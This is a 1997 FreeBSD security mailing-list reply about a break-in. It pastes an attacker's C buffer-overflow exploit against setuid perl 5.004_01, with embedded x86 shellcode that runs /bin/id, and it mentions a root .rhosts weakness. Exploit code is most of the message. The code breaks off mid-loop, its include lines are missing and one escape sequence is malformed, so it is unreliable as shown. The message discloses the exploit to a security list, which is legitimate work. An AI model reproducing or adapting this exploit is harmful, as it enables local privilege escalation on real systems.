From owner-freebsd-security Wed Jul 30 11:39:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23382 for security-outgoing; Wed, 30 Jul 1997 11:39:53 -0700 (PDT) Received: from bizet.videotron.net (bizet.videotron.net [205.151.222.75]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23376 for ; Wed, 30 Jul 1997 11:39:50 -0700 (PDT) Received: from gvl-07851 (poste221.vl.videotron.net [206.231.222.221]) by bizet.videotron.net (8.8.5/8.8.2) with SMTP id OAA09501 for ; Wed, 30 Jul 1997 14:39:10 -0400 (EDT) Message-Id: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca> X-Sender: gilbertp@pop.videotron.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.2 (32) Date: Wed, 30 Jul 1997 14:44:02 -0400 To: security@FreeBSD.ORG From: Patrick Gilbert Subject: Re: security hole in FreeBSD In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk At 17:27 97-07-28 -0700, you wrote: > Just a update on how the break-in was done after the hacker was >confronted on irc. > > Apparently FreeBSD ships with .rhosts in the root account. Using >this and perl5.00401, the user was able to rlogin onto the other machine >without using a password. After a brief discussion with TheCa on Efnet, he dcc'd me his famous exploit for a transcript of his brief moment of fame on this discussion list. /* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl exploit by Ovx */ #include #include #include #define BUFFER_SIZE 1400 #define OFFSET 600 char *get_esp(void) { asm("movl %esp,%eax"); } char buf[BUFFER_SIZE]; main(int argc, char *argv[]) { int i; char execshell[] = "\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; for(i=0+1;i